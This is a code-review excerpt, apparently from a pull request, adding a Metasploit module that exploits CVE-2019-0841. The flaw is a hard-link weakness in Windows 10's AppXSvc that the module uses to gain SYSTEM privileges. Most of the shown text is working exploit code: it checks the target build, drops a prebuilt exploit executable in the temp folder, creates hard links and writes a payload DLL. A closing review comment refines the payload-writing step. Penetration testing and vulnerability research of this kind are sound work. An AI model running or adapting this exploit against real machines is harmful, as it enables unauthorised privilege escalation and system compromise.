modules/exploits/windows/local/appxsvc_hard_link_privesc.rb

```diff
@@ -0,0 +1,147 @@
+        There exists a privilege escalation vulnerability for
+        Windows 10 builds prior to build 17763. Due to the AppXSvc's
+        improper handling of hard links, a user can gain full
+        privileges over a SYSTEM-owned file. The user can then utilize
+        the new file to execute code as SYSTEM.
+
+        This module employs a technique using the Diagnostics Hub Standard
+        Collector Service (DiagHub) which was discovered by James Forshaw to
+        load and execute a DLL as SYSTEM.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nabeel Ahmed',      # Vulnerability discovery and PoC
+        'James Forshaw',     # Code creating hard links and communicating with DiagHub service
+        'Shelby Pace'        # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-0841' ],
+          [ 'URL', 'https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html' ],
+          [ 'URL', 'https://0x00-0x00.github.io/research/2019/05/30/Coding-a-reliable-CVE-2019-0841-Bypass.html' ]
+        ],
+      'Targets'        =>
+        [
+          [ 'Windows 10', { 'Platform' => 'win' } ]
+        ],
+      'DisclosureDate' => '2019-04-09',
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def check
+    return CheckCode::Unknown if sysinfo['OS'] !~ /windows\s10/i
+
+    path = expand_path('%WINDIR%\\system32\\win32k.sys')
+    major, minor, build, revision, brand = file_version(path)
+    return CheckCode::Appears if build < 17763
+
+    CheckCode::Detected
+  end
+
+  def validate_target
+    fail_with(Failure::None, 'Already running with SYSTEM privileges') if is_system?
+
+    fail_with(Failure::NoTarget, 'The target is not running Windows') unless session.platform == 'windows'
+  end
+
+  def write_to_disk
+    link_file_name = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(6...8)}.exe")
+    if session.arch == ARCH_X86
+      exe_name = 'CVE-2019-0841_x86.exe'
+    elsif session.arch == ARCH_X64
+      exe_name = 'CVE-2019-0841_x64.exe'
+    end
+    contents = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-0841', exe_name))
+    write_file(link_file_name, contents)
+    register_file_for_cleanup(link_file_name)
+    link_file_name
+  rescue
+    fail_with(Failure::UnexpectedReply, 'Failed to write file contents to target')
+  end
+
+  def init_process
+    print_status("Attempting to launch Microsoft Edge minimized.")
+    cmd_exec("cmd.exe /c start /min microsoft-edge:", nil, 30)
+  end
+
+  def mk_hard_link(src, target, link_exe)
+    out = cmd_exec("cmd.exe /c #{link_exe} \"#{src}\" \"#{target}\"")
+
+    return (out && out.include?('Done'))
+  end
+
+  def write_payload(file_name)
```

Comment:
Use `@rtf_path` variable and remove `code` variable. Move `@original_data` to this block.

```
  def write_payload
    print_status('Writing the payload to disk')
    @original_data = read_file(@rtf_path)
    write_file(@rtf_path, generate_payload_dll)
  end
```